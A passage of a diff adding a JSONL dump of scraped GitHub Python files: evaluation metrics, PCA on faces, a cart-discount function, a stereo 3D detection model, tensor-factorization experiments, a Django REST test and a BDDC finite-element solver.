diff --git "a/2293.jsonl" "b/2293.jsonl" new file mode 100644--- /dev/null +++ "b/2293.jsonl" @@ -0,0 +1,1586 @@ +{"seq_id":"14890886439","text":"import numpy as np\nimport pandas as pd\n\n\n# 混淆矩阵\ndef confusion_matrix(y_true, y_pred, labels=[0, 1, 2]):\n # 默认转换为numpy数组\n # y_true, y_pred = np.array(y_true), np.array(y_pred)\n\n n = len(labels)\n matrix = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n if i == j:\n index = (y_true == labels[i])\n matrix[i][j] = sum(y_true[index] == y_pred[index])\n else:\n # wrongly predict i to j\n index = (y_true == labels[i])\n matrix[i][j] = sum(y_pred[index] == labels[j])\n\n return matrix\n\n\n# 精度\ndef precision(conf_matrix):\n n = len(conf_matrix)\n P = np.zeros((n,))\n\n for i in range(n):\n P[i] = conf_matrix[i][i] / sum(conf_matrix[:, i])\n # print('精度: ', P)\n return sum(P) / n\n\n\n# 召回率\ndef recall(conf_matrix):\n n = len(conf_matrix)\n R = np.zeros((n,))\n\n for i in range(n):\n R[i] = conf_matrix[i][i] / sum(conf_matrix[i, :])\n # print('召回率: ', R)\n return sum(R) / n\n\n\n# F1度量\ndef F1_score(P, R):\n return 2 * P * R / (P + R)\n","repo_name":"lqz72/MNIST-classifier","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38566364604","text":"from matplotlib.pyplot import plot\r\nfrom model import pca, find_k\r\nimport numpy as np\r\nimport functions\r\n\r\n\r\n# Loading data and plotting faces\r\nX = functions.load_data(r'D:\\ML\\PCA\\faces.mat')\r\nfunctions.plot_faces(X)\r\n\r\n# Normalizing data\r\nX_normalized = X / 255\r\n\r\n\r\n# Running PCA\r\nU, S, V = pca(X_normalized)\r\n\r\n# Plotting first 36 eigen vectors\r\nfunctions.plot_faces(np.transpose(U[:, :36]) * 255)\r\n\r\n\r\n# Finding number of pricipal components\r\nk, variance_retained = find_k(S)\r\n\r\nprint(f\"\\nnumber of principal components = {k}\")\r\n\r\n\r\n# Reduction\r\nU_reduce = U[:, :k]\r\nz = np.dot(X_normalized, U_reduce)\r\n\r\n\r\n# Recovering features\r\nX_recovered = np.dot(z, np.transpose(U_reduce))\r\n\r\nX_recovered *= 255\r\nfunctions.plot_faces(X_recovered)\r\n","repo_name":"rishabmamgai/PCA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26447642806","text":"reduction = 0\n\ndef reduction_prixPanier(panier):\n prixTotal = []\n global reduction\n for prod in panier: # Kevin Bonga, aide pour la boucle en WEBA\n listQuantite = int(prod.get(\"quantity\"))\n listPrix = prod.get(\"price\")\n\n if type(listQuantite) == int and type(listPrix) == float:\n totalLigne = float(listPrix) * listQuantite\n prixTotal.append(totalLigne)\n else:\n raise TypeError('La quantité doit être en int, les prix en float.')\n\n prixTotal = sum(prixTotal)\n\n if (prixTotal) and (listQuantite) and (listPrix) < 0:\n raise TypeError('Le montant doit être positif.')\n else:\n if (prixTotal >= 1000):\n prixTotal=prixTotal*80/100\n reduction = prixTotal*20/100\n elif (prixTotal >= 500 and prixTotal < 1000):\n prixTotal=prixTotal * 90 / 100\n reduction = prixTotal*10/100\n elif (prixTotal >= 250 and prixTotal < 500):\n prixTotal=prixTotal * 95 / 100\n reduction = prixTotal*5/100\n else:\n prixTotal\n reduction\n return prixTotal\n","repo_name":"andrepntlv/Projet_Tests_Python","sub_path":"reduction_prixPanier.py","file_name":"reduction_prixPanier.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36931759202","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.ops import nms\nfrom visualDet3D.networks.utils.registry import DETECTOR_DICT\nfrom visualDet3D.utils.timer import profile\nfrom visualDet3D.networks.heads import losses\nfrom visualDet3D.networks.detectors.yolostereo3d_core import YoloStereo3DCore\nfrom visualDet3D.networks.heads.detection_3d_head import StereoHead\nfrom visualDet3D.networks.lib.blocks import AnchorFlatten, ConvBnReLU\nfrom visualDet3D.networks.backbones.resnet import BasicBlock\n\n\n\n@DETECTOR_DICT.register_module\nclass Stereo3D(nn.Module):\n \"\"\"\n Stereo3D\n \"\"\"\n def __init__(self, network_cfg):\n super(Stereo3D, self).__init__()\n\n self.obj_types = network_cfg.obj_types\n\n self.build_head(network_cfg)\n\n self.build_core(network_cfg)\n\n self.network_cfg = network_cfg\n\n def build_core(self, network_cfg):\n self.core = YoloStereo3DCore(network_cfg.backbone)\n\n def build_head(self, network_cfg):\n self.bbox_head = StereoHead(\n **(network_cfg.head)\n )\n\n self.disparity_loss = losses.DisparityLoss(maxdisp=96)\n\n def train_forward(self, left_images, right_images, annotations, P2, P3, disparity=None):\n \"\"\"\n Args:\n img_batch: [B, C, H, W] tensor\n annotations: check visualDet3D.utils.utils compound_annotation\n calib: visualDet3D.kitti.data.kitti.KittiCalib or anything with obj.P2\n Returns:\n cls_loss, reg_loss: tensor of losses\n loss_dict: [key, value] pair for logging\n \"\"\"\n output_dict = self.core(torch.cat([left_images, right_images], dim=1))\n depth_output = output_dict['depth_output']\n\n cls_preds, reg_preds = self.bbox_head(\n dict(\n features=output_dict['features'],\n P2=P2,\n image=left_images\n )\n )\n\n anchors = self.bbox_head.get_anchor(left_images, P2)\n\n cls_loss, reg_loss, loss_dict = self.bbox_head.loss(cls_preds, reg_preds, anchors, annotations, P2)\n\n if reg_loss.mean() > 0 and not disparity is None and not depth_output is None:\n disp_loss = 1.0 * self.disparity_loss(depth_output, disparity)\n loss_dict['disparity_loss'] = disp_loss\n reg_loss += disp_loss\n\n self.depth_output = depth_output.detach()\n else:\n loss_dict['disparity_loss'] = torch.zeros_like(reg_loss)\n return cls_loss, reg_loss, loss_dict\n\n def test_forward(self, left_images, right_images, P2, P3):\n assert left_images.shape[0] == 1 # we recommmend image batch size = 1 for testing\n\n output_dict = self.core(torch.cat([left_images, right_images], dim=1))\n depth_output = output_dict['depth_output']\n\n cls_preds, reg_preds = self.bbox_head(\n dict(\n features=output_dict['features'],\n P2=P2,\n image=left_images\n )\n )\n\n anchors = self.bbox_head.get_anchor(left_images, P2)\n\n scores, bboxes, cls_indexes = self.bbox_head.get_bboxes(cls_preds, reg_preds, anchors, P2, left_images)\n \n return scores, bboxes, cls_indexes\n\n\n def forward(self, inputs):\n\n if isinstance(inputs, list) and len(inputs) >= 5:\n return self.train_forward(*inputs)\n else:\n return self.test_forward(*inputs)\n","repo_name":"Owen-Liuyuxuan/visualDet3D","sub_path":"visualDet3D/networks/detectors/yolostereo3d_detector.py","file_name":"yolostereo3d_detector.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"32448634684","text":"from data_helper import fdtf_config\nfrom fdtf import FDTF\nfrom utils import make_dir, strRed, strBlue\nimport json\nimport os\nimport numpy as np\nimport pickle\nfrom multiprocessing import Lock, Pool\n\noutput_lock = Lock()\n\n\ndef run_fdtf_exp(data_str, course_str, model_str, fold, concept_dim, lambda_t,\n lambda_q, lambda_bias, slr, lr, max_iter, metrics, log_file, validation, validation_limit = 30, test_range = None):\n \"\"\"\n cross validation on the first fold of dataset to tune the hyper-parameters,\n then we will use those best hyper-parameters evaluate the performance on all folds\n \"\"\"\n\n if course_str == \"Quiz\" or course_str == \"QuizIceBreaker\":\n views = \"100\"\n elif course_str == \"Lecture\":\n views = \"010\"\n elif course_str == \"Discussion\":\n views = \"001\"\n elif course_str == \"Quiz_Lecture\":\n views = \"110\"\n elif course_str == \"Quiz_Discussion\":\n views = \"101\"\n elif course_str == \"Quiz_Lecture_Discussion\":\n views = \"111\"\n else:\n raise IOError\n\n model_config = fdtf_config(\n data_str, course_str, views, concept_dim, fold, lambda_t, lambda_q,\n lambda_bias, slr, lr, max_iter, metrics, log_file, validation, validation_limit, test_range)\n\n\n if model_str == 'fdtf':\n model = FDTF(model_config)\n else:\n raise EnvironmentError(\"ERROR!!\")\n\n if validation is True:\n test_data = model_config['val']\n else:\n test_data = model_config['test']\n model.train_data.extend(model_config['val'])\n\n # since the test start attempt for different students are different,\n # we need to find the first testing attempt, and add all lectures and discussion before\n # test_start_attempt into train_data\n\n test_start_attempt = None\n for (student, attempt, material, score, resource) in sorted(test_data, key=lambda x: x[1]):\n if resource == 0:\n test_start_attempt = attempt\n break\n else:\n model.train_data.append((student, attempt, material, score, resource))\n if test_start_attempt is None:\n raise EnvironmentError\n\n perf_dict = {}\n for test_attempt in range(test_start_attempt, model.num_attempts):\n model.current_test_attempt = test_attempt\n model.lr = lr\n restart_training(model)\n train_perf = model.training()\n\n test_set = []\n for (student, attempt, material, score, resource) in test_data:\n if attempt == model.current_test_attempt:\n test_set.append((student, attempt, material, score, resource))\n model.train_data.append((student, attempt, material, score, resource))\n\n test_perf = model.testing(test_set)\n if test_attempt not in perf_dict:\n perf_dict[test_attempt] = {}\n perf_dict[test_attempt]['train'] = train_perf\n if validation:\n perf_dict[test_attempt]['val'] = test_perf\n else:\n perf_dict[test_attempt]['test'] = test_perf\n\n overall_perf = model.eval(model.test_obs_list, model.test_pred_list)\n if validation:\n perf_dict['val'] = overall_perf\n else:\n perf_dict['test'] = overall_perf\n\n\n for stu in range(0, model.num_users):\n if stu in model_config['max_stu_attempt']:\n max_att = model_config['max_stu_attempt'][stu]\n if max_att < model.num_attempts - 1:\n model.T[stu,max_att + 2:] = model.T[stu, max_att + 1]\n\n save_exp_results(model, perf_dict, data_str, course_str, model_str, fold,\n concept_dim, lambda_t, lambda_q, lambda_bias, slr, lr,max_iter, validation=validation)\n\n\ndef restart_training(model):\n # initialize the bias for each attempt, student, question, lecture, or discussion\n if int(model.views[0]) == 1:\n model.T = np.random.random_sample((model.num_users, model.num_attempts,\n model.num_concepts))\n model.Q = np.random.random_sample((model.num_concepts, model.num_questions))\n model.bias_s = np.zeros(model.num_users)\n model.bias_t = np.zeros(model.num_attempts)\n model.bias_q = np.zeros(model.num_questions)\n model.global_bias = np.mean(model.train_data, axis=0)[3]\n else:\n raise AttributeError\n\n return model\n\n\ndef save_exp_results(model, perf_dict, data_str, course_str, model_str, fold,\n concept_dim, lambda_t, lambda_q, lambda_bias, slr, lr, max_iter, validation):\n\n if not validation:\n model_dir_path = \"saved_models/{}/{}/{}/fold_{}\".format(data_str, course_str, model_str,\n fold)\n make_dir(model_dir_path)\n para_str = \"concept_{}_lt_{}_lq_{}_lbias_{}_slr_{}_\" \\\n \"lr_{}_max_iter_{}\".format(concept_dim,lambda_t, lambda_q,lambda_bias, slr, lr, max_iter)\n model_file_path = \"{}/{}_model.pkl\".format(model_dir_path, para_str)\n pickle.dump(model, open(model_file_path, \"wb\"))\n\n result_dir_path = \"results/{}/{}/{}\".format(\n data_str, course_str, model_str\n )\n make_dir(result_dir_path)\n\n if validation:\n result_file_path = \"{}/fold_{}_cross_val.json\".format(result_dir_path, fold)\n else:\n result_file_path = \"{}/fold_{}_test_results.json\".format(result_dir_path, fold)\n\n if not os.path.exists(result_file_path):\n with open(result_file_path, \"w\") as f:\n pass\n\n result = {\n 'concept_dim': concept_dim,\n 'lambda_t': lambda_t,\n 'lambda_q': lambda_q,\n 'lambda_bias': lambda_bias,\n 'student_learning_rate': slr,\n 'learning_rate': lr,\n 'max_iter': max_iter,\n 'perf': perf_dict\n }\n\n output_lock.acquire()\n with open(result_file_path, \"a\") as f:\n f.write(json.dumps(result) + \"\\n\")\n output_lock.release()\n\n\ndef print_experiment_results(data_str, course_str, model_str, metric, num_folds=5):\n \"\"\"\n find best hyperparameter via k-fold cross validation\n :param data_str:\n :param course_str:\n :param model_str:\n :param num_folds:\n :return:\n \"\"\"\n combined_results = {}\n combined_detail_results = {}\n # for fold in [1,5]:\n for fold in range(1, num_folds + 1):\n output_path = \"results/{}/{}/{}/fold_{}_test_results.json\".format(\n data_str, course_str, model_str, fold\n )\n\n with open(output_path, \"r\") as f:\n count = 0\n for line in f:\n count += 1\n result = json.loads(line)\n key = (data_str, course_str, model_str,\n result['concept_dim'],\n result['lambda_t'],\n result['lambda_q'],\n result['lambda_bias'],\n result['student_learning_rate'],\n result['learning_rate'], result['max_iter'])\n perf = result[\"perf\"]['test']\n detail_perf = result[\"perf\"]\n\n if key not in combined_results:\n combined_results[key] = {}\n combined_results[key][fold] = perf\n\n if key not in combined_detail_results:\n combined_detail_results[key] = {}\n if fold not in combined_detail_results[key]:\n combined_detail_results[key][fold] = detail_perf\n\n # compute the average perf over k folds on a specific metric\n for para in combined_results.keys():\n perf_list = []\n for fold in combined_results[para]:\n print(strBlue(combined_results[para][fold][metric]))\n perf_list.append(combined_results[para][fold][metric])\n avg_perf = np.mean(perf_list)\n combined_results[para] = avg_perf\n\n print(strRed('avg: {}'.format(avg_perf)))\n\n\n for para in combined_detail_results.keys():\n for fold in combined_detail_results[para]:\n print(strRed(\"\\nfold, attempt, train count, train rmse, val count, val {}\".format(metric)))\n for attempt in combined_detail_results[para][fold]:\n if attempt != \"test\":\n train_count, train_rmse = combined_detail_results[para][fold][attempt]['train']\n if combined_detail_results[para][fold][attempt]['test'] == {}:\n test_count = 0\n test_metric = 0\n else:\n test_count = combined_detail_results[para][fold][attempt]['test']['count']\n test_metric = combined_detail_results[para][fold][attempt]['test'][metric]\n print(\"{},{},{:.0f},{:.4f},{:.0f},{}\".format(\n fold, attempt, train_count, train_rmse, test_count, test_metric))\n\n\n\n\ndef run_mastery_grids():\n data_str = \"mastery_grids\"\n course_str = 'Quiz'\n model_str = 'fdtf'\n\n if course_str == \"Quiz\":\n concept_dim = 15\n lambda_t = 0\n lambda_q = 0.01\n lambda_bias = 0\n slr = 0.5\n lr = 0.1\n max_iter = 30\n\n validation = False\n metrics = [\"rmse\", \"mae\", \"auc\"]\n\n num_folds = 1\n for fold in range(1, num_folds + 1):\n log_path = \"logs/{}/{}/{}/test_fold_{}/\".format(data_str, course_str, model_str, fold)\n make_dir(log_path)\n\n para = [data_str, course_str, model_str, fold, concept_dim,\n lambda_t, lambda_q, lambda_bias, slr, lr, max_iter]\n\n delimiter = '_'\n log_name = delimiter.join([str(e) for e in para[4:]])\n log_file = \"{}/{}\".format(log_path, log_name)\n para.append(metrics)\n para.append(log_file)\n para.append(validation)\n\n run_fdtf_exp(*para)\n\n\ndef run_morf():\n data_str = \"morf\"\n # course_str = 'Quiz'\n # course_str = 'Quiz_Lecture'\n # course_str = 'Quiz_Discussion'\n # course_str = 'Quiz_Lecture_Discussion'\n course_str = 'QuizIceBreaker'\n model_str = 'fdtf'\n\n test_range = None\n\n if course_str == \"Quiz\":\n concept_dim = 5\n lambda_t = 0.001\n lambda_q = 0\n lambda_bias = 0\n slr = 0.5\n lr = 0.1\n max_iter = 50\n\n if course_str == \"Quiz_Lecture\":\n concept_dim = 7\n lambda_t = 0.01\n lambda_q = 0\n lambda_bias = 0\n slr = 0.4\n lr = 0.1\n max_iter = 30\n\n if course_str == 'Quiz_Discussion':\n concept_dim = 5\n lambda_t = 0.1\n lambda_q = 0\n lambda_bias = 0\n slr = 0.7\n lr = 0.1\n max_iter = 30\n\n if course_str == 'Quiz_Lecture_Discussion':\n concept_dim = 9\n lambda_t = 0.1\n lambda_q = 0\n lambda_bias = 0\n slr = 0.5\n lr = 0.1\n max_iter = 30\n\n if course_str == 'QuizIceBreaker':\n concept_dim = 5\n lambda_t = 0.01\n lambda_q = 0\n lambda_bias = 0.0001\n slr = 1.0\n lr = 0.1\n max_iter = 20\n\n test_range = [1, 25]\n\n validation = False\n validation_limit = 30\n metrics = [\"rmse\", \"mae\"]\n\n para_list = []\n num_folds = 5\n\n step = 1\n\n if step == 1:\n for fold in range(1, num_folds + 1):\n log_path = \"logs/{}/{}/{}/test_fold_{}/\".format(data_str, course_str, model_str, fold)\n make_dir(log_path)\n\n para = [data_str, course_str, model_str, fold, concept_dim,\n lambda_t, lambda_q, lambda_bias, slr, lr, max_iter]\n\n delimiter = '_'\n log_name = delimiter.join([str(e) for e in para[4:]])\n log_file = \"{}/{}\".format(log_path, log_name)\n para.append(metrics)\n para.append(log_file)\n para.append(validation)\n para.append(validation_limit)\n para.append(test_range)\n\n\n # run_fdtf_exp(*para)\n para_list.append(para)\n pool = Pool(processes=5)\n pool.starmap(run_fdtf_exp, para_list)\n pool.close()\n\n if step == 2:\n print_experiment_results(data_str, course_str, model_str, metric = \"rmse\", num_folds = 5)\n\n\ndef run_laura():\n data_str = \"laura\"\n course_str = 'QuizIceBreaker'\n model_str = 'fdtf'\n\n\n if course_str == 'QuizIceBreaker':\n concept_dim = 7\n lambda_t = 0.001\n lambda_q = 0\n lambda_bias = 0.001\n slr = 0.5\n lr = 0.1\n max_iter = 20\n\n test_range = [1, 50]\n\n validation = False\n validation_limit = 30\n metrics = [\"rmse\", \"mae\"]\n\n para_list = []\n num_folds = 5\n\n step = 1\n\n if step == 1:\n for fold in range(1, num_folds + 1):\n log_path = \"logs/{}/{}/{}/test_fold_{}/\".format(data_str, course_str, model_str, fold)\n make_dir(log_path)\n\n para = [data_str, course_str, model_str, fold, concept_dim,\n lambda_t, lambda_q, lambda_bias, slr, lr, max_iter]\n\n delimiter = '_'\n log_name = delimiter.join([str(e) for e in para[4:]])\n log_file = \"{}/{}\".format(log_path, log_name)\n para.append(metrics)\n para.append(log_file)\n para.append(validation)\n para.append(validation_limit)\n para.append(test_range)\n\n\n # run_fdtf_exp(*para)\n para_list.append(para)\n pool = Pool(processes=5)\n pool.starmap(run_fdtf_exp, para_list)\n pool.close()\n\n if step == 2:\n print_experiment_results(data_str, course_str, model_str, metric = \"rmse\", num_folds = 5)\n\n\nif __name__ == '__main__':\n # run_mastery_grids()\n run_morf()\n # run_laura()","repo_name":"sz612866/Tensor-Factorization-EDM","sub_path":"FDTF/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":13617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"69904356969","text":"from django.urls import include, path, reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase, URLPatternsTestCase\n\n\nclass AccountTests(APITestCase, URLPatternsTestCase):\n urlpatterns = [\n path(\"\", include(\"hello_world.urls\")),\n ]\n\n def test_hello_world(self):\n \"\"\"\n Ensure we can create a new account object.\n \"\"\"\n url = reverse(\"hello-world\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, {\"msg\": \"Hello world\"})\n","repo_name":"bergran/drf_template","sub_path":"hello_world/tests/test_hello_world.py","file_name":"test_hello_world.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20849645211","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[50]:\n\n\nimport numpy as np\nimport math\nimport scipy\nimport scipy.linalg \n\n\n# In[ ]:\n\n\n\n\n\n# In[51]:\n\n\nNvm = 10\nnvm=10\n\n\n# In[52]:\n\n\ndef Fc(x):\n global lb\n global lnv\n global ng\n global DomNum\n global domain_B\n global domain_KiiR\n global domain_K\n global lii\n \n y = np.zeros([ng, 1]);\n yy = np.zeros([lnv, 1]);\n w = np.zeros([lnv, 1]);\n lb =lb.astype('int')\n \n for i in range(DomNum):\n [n] = lb.shape\n [m] = lii[0, :].shape\n w[lb-1, :] = domain_B[i, lb-1, :]@x;\n Ri = domain_KiiR[i, :, :]\n temp_matrix = np.zeros([n, m])\n for j in range(n):\n for k in range(m):\n temp_matrix[j,k] = domain_K[i, lb[j]-1, lii[0,k]-1]\n temp2 = np.zeros([n,n])\n for j in range(n):\n for k in range(n):\n temp2[j,k] = domain_K[i, lb[j]-1, lb[k]-1]\n temp4 = np.zeros([m,n])\n for j in range(m):\n for k in range(n):\n temp4[j, k] = domain_K[i, lii[0, j]-1, lb[k]-1]\n temp3 = np.linalg.solve(Ri.T, temp4@w[lb-1])\n temp3 = np.linalg.solve(Ri, temp3)\n yy[lb-1, :] = temp2@w[lb-1, :]-temp_matrix@temp3\n y = y+domain_B[i, lb-1, :].T@yy[lb-1];\n return y\n\n\n# In[53]:\n\n\ndef pc(x):\n y1 = np.zeros([ng, 1])\n y2 = np.zeros([nc,1])\n yc = np.zeros([nc, 1])\n y3 = np.zeros([ng,1])\n D_lb = np.zeros([DomNum,lb.size, lb.size])\n K_cr = np.zeros([DomNum, lcc.size, lrr.size])\n K_rc = np.zeros([DomNum, lrr.size, lcc.size])\n for i in range(DomNum):\n for j in range(lb.size):\n for k in range(lb.size):\n D_lb[i, j,k] = domain_D[i,lb[j]-1,lb[k]-1]\n for j in range(lcc.size):\n for k in range(lrr.size):\n K_cr[i,j,k] = domain_K[i,lcc[j]-1,lrr[k]-1]\n for j in range(lrr.size):\n for k in range(lcc.size):\n K_rc[i,j,k] = domain_K[i,lrr[j]-1,lcc[k]-1]\n for i in range(DomNum):\n lx = np.zeros([lnv,1])\n llx = np.zeros([lnv,1])\n \n lx[lb-1] = D_lb[i,:,:]@domain_B[i,lb-1,:]@x\n ytemp=np.linalg.solve(domain_KrrR[i,:,:].T, lx[lrr-1])\n ytemp = np.linalg.solve(domain_KrrR[i, :, :], ytemp)\n llx[lrr-1] = ytemp\n \n y1 = y1+domain_B[i,lb-1,:].T@D_lb[i,:,:].T@llx[lb-1]\n lx[lcc-1]=lx[lcc-1]-K_cr[i,:,:]@ytemp\n yc = yc+domain_Bc[i,lb-1, :].T@lx[lb-1]\n y2 = np.linalg.solve(Rc.T, yc)\n y2 = np.linalg.solve(Rc, y2)\n for i in range(DomNum):\n lx = np.zeros([lnv,1])\n llx = np.zeros([lnv,1])\n ytempc = domain_Bc[i,lcc-1,:]@y2\n lx[lcc-1]=ytempc\n ytemp = K_rc[i,:,:]@ytempc\n ytemp = np.linalg.solve(domain_KrrR[i,:,:].T, ytemp)\n ytemp = np.linalg.solve(domain_KrrR[i,:,:], ytemp)\n lx[lrr-1] = -ytemp\n y3 = y3+domain_B[i,lb-1,:].T@D_lb[i,:,:].T@lx[lb-1]\n y=y1+y3\n return y\n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[54]:\n\n\ndef cg(x, b, max_it, tol):\n flag = 0;\n iterate = 0;\n bnrm2 = np.linalg.norm(b);\n if bnrm2 == 0:\n brnm2 = 1;\n alpha = np.zeros(max_it)\n beta = np.zeros(max_it)\n d = np.zeros(max_it)\n s = np.zeros(max_it-1)\n r=b-Fc(x);\n error = np.linalg.norm(r)/bnrm2;\n if error0:\n beta[iterate] = rho/rho_1;\n p = z+beta[iterate]*p;\n else:\n p=z;\n q = Fc(p);\n alpha[iterate] = rho/(p.T@q)\n x= x+alpha[iterate]*p\n r=r-alpha[iterate]*q;\n error = np.linalg.norm(r)/bnrm2;\n print('PCG residual('+ str(iterate) +') = '+str(error))\n if error<=tol:\n break\n rho_1=rho;\n d[0] = 1/alpha[0]\n for i in range(iterate-1):\n d[i+1] = beta[i+1]/alpha[i]+1/alpha[i+1]\n for i in range(iterate-1):\n s[i] = -1*((beta[i+1])**.5)/alpha[i]\n T = np.zeros([iterate, iterate])\n T[0,0] = d[0]\n for i in range(iterate-1):\n T[i+1,i+1] = d[i+1]\n for i in range(iterate-1):\n T[i,i+1] = s[i]\n T[i+1,i] = T[i,i+1]\n lamb = np.linalg.eig(T)\n lamb = lamb[0]\n lambmax = lamb.max()\n lambmin = lamb.min()\n condnumber = lambmax/lambmin\n print('lambda max = ' + str(lambmax))\n print('lambda min = ' + str(lambmin))\n print('condition number = ' + str(condnumber))\n if error>tol:\n flag = 1\n #if 1 then no convergeance\n \n return [x, error, iterate, flag]\n \n\n\n# In[55]:\n\n\nrange(0)\n\n\n# In[56]:\n\n\ndef BDDC(Nvm, nvm, a1, a2):\n #--------These constant for grid ------------ \n sqr15 = math.sqrt(15)\n intx=np.array([1/3, (6+sqr15)/21, (9-2*sqr15)/21, (6+sqr15)/21, (6-sqr15)/21, (9+2*sqr15)/21, (6-sqr15)/21]);\n\n inty=np.array([1/3, (6+sqr15)/21, (6+sqr15)/21, (9-2*sqr15)/21, (6-sqr15)/21, (6-sqr15)/21, (9+2*sqr15)/21]);\n\n intw=np.array([9/80, (155+sqr15)/2400, (155+sqr15)/2400, (155+sqr15)/2400, (155-sqr15)/2400, (155-sqr15)/2400, (155-sqr15)/2400]);\n\n #======================================================\n import time\n start = time.time()\n #-------- This constant for PCG -------------\n\n max_it=1000; \n tol=10**(-8);\n #======================================================\n\n rm=1;\n rn=1;\n\n global DomNum\n global lii\n global lb\n global lrr\n global lnv\n global nv\n global nr\n global ng\n global nr1\n global ldd\n global lcc\n global domain_B\n global domain_KiiR\n global domain_K\n global nc\n global domain_D\n global Rc\n global domain_KrrR\n global domain_K\n global domain_Bc\n \n \n \n Nvn=Nvm;\n Ne=Nvm*Nvn;\n Hm=rm/Nvm;\n Hn=rn/Nvn;\n DomNum=Nvm*Nvn;\n # order all the domain \n\n\n\n # get the mesh in each subdomain \n\n nvn=nvm;\n hm=rm/(nvm*Nvm);\n hn=rn/(nvn*Nvn);\n ne=Nvm*Nvn*nvm*nvn*2;\n pi = math.pi\n nvm1=nvm+1;\n nvn1=nvn+1;\n nvm01=nvm-1;\n Nvm01=Nvm-1;\n\n lnv=nvm1*nvn1;\n \n # domain struct:\n # int num; /* global number of the domain */\n # Mat K; /* local stiffness matrix */\n # Vec f; \n # Mat BrT; /* transpose if the connectivity matrices;\n # Mat Bc; /* the corner connectivity matrix */\n # Mat Q; /* matrix for optional (e.g. edge) constraints */\n # set InteriorN /* Interior nodes */\n # set Boundary[4] /* boundary nodes */\n\n # initial the domain structure \n\n eachne=nvm*nvn*2;\n eachnv=nvn1*nvm1;\n lnv=eachnv;\n nv=lnv*Nvm*Nvn;\n\n # to get the local connectivity matrix\n\n lijtk=np.reshape(np.linspace(1,lnv,num=lnv),(nvn1,nvm1));\n lnconn= np.zeros([3, nvm*nvn*2])\n ii=0;\n for i in range(nvm):\n ip=i+1;\n for j in range(nvn):\n jp=j+1;\n lnconn[0,ii] =lijtk[i,j];\n lnconn[1,ii] =lijtk[ip,j];\n lnconn[2,ii] =lijtk[ip,jp];\n lnconn[0,ii+1]=lijtk[i,j];\n lnconn[1,ii+1]=lijtk[i,jp];\n lnconn[2,ii+1]=lijtk[ip,jp];\n ii=ii+2; \n lii = np.reshape((lijtk[1:nvm,1:nvn]),(1,(nvn-1)*(nvm-1))) ;\n lb=np.union1d(lijtk[0,:], lijtk[nvm1-1,:])\n lb=np.union1d(lb, lijtk[1:nvm,0]);\n lb=np.union1d(lb, (lijtk[1:nvm,nvn1-1]).T);\n ldd= lb;\n lrr= np.append(lii[0,:], [lb]);\n lcc=np.array([lijtk[0,0], lijtk[0,nvn1-1], lijtk[nvm1-1,0], lijtk[nvm1-1,nvn1-1]]);\n lrr=np.setdiff1d(lrr,lcc);\n lrr = lrr.astype('int')\n ldd=np.setdiff1d(ldd,lcc);\n ss=lrr.size;\n lnr=ss;\n ss=lii.size;\n lni=ss;\n ss=lb.size;\n lnb=ss;\n nr=(nvm-1)*Nvn*Nvm01*2;\n nc=(Nvm-1)*Nvm01;\n\n ng=nvm01*Nvn*Nvm01*2+Nvm01*Nvm01;\n dsize=Nvm*Nvn\n dindex=0;\n domain_num = np.empty(dsize)\n domain_utrue = np.empty([dsize,lnv])\n domain_u = np.empty([dsize,lnv])\n domain_rho = np.empty(dsize)\n domain_K = np.empty([dsize, eachnv, eachnv])\n domain_Kdi = np.empty([dsize, ldd.size, lii.size])\n domain_KiiR = np.empty([dsize, lii.size, lii.size])\n domain_KrrR = np.empty([dsize, lrr.size, lrr.size])\n domain_Kci =np.empty([dsize, lcc.size, lii.size])\n domain_Kcc = np.empty([dsize, lcc.size, lcc.size])\n domain_Krc= np.empty([dsize, lrr.size, lcc.size])\n domain_fd = np.empty([dsize, ldd.size])\n domain_fc = np.empty([dsize, lcc.size])\n domain_fi =np.empty([dsize, lii.size])\n domain_fb = np.empty([dsize, lb.size])\n domain_u =np.empty([dsize, lnv])\n domain_ff = np.empty([dsize, lnv, 1])\n domain_Bc = np.empty([dsize, lnv, nc])\n domain_D = np.empty([dsize, lnv, lnv])\n domain_B = np.empty([dsize, lnv, ng])\n \n for ii in range(Nvm):\n for jj in range(Nvn):\n #order the domain by the order\n #5 10\n #4 9 \n #3 8\n #2 7\n #1 6\n aK = np.zeros([eachnv, eachnv]);\n f= np.zeros([eachnv,1]);\n dindex = dindex+1;\n domain_num[dindex-1]=dindex;\n ebegin=(dindex-1)*eachne+1;\n eend= ebegin+eachne-1;\n rmb = (ii)*Hm; # begin x coord\n rme = rmb+hm*nvm; #end x coord\n rnb = (jj)*Hn;#begin y coord\n rne= rnb+hn*nvn; #end y coord\n x = np.zeros([2,lnv]);\n for i in range(nvm1):\n for j in range(lijtk[i,:].shape[0]):\n x[1,int(lijtk[i,j]-1)] = np.linspace(rnb,rne,num=nvn1)[j];\n for i in range(nvn1):\n for j in range(lijtk[:,i].shape[0]):\n x[0,int(lijtk[j,i]-1)] = np.linspace(rmb,rme,num=nvm1)[j];\n b=np.zeros([lnv,1]);\n coeff = np.zeros([eachne])\n mydet = np.zeros([eachne])\n for k in range(eachne):\n n1 = int(lnconn[0,k]);\n n2 = int(lnconn[1,k]);\n n3 = int(lnconn[2,k]);\n x1 =x[0,n1-1];\n y1 = x[1,n1-1];\n x2 = 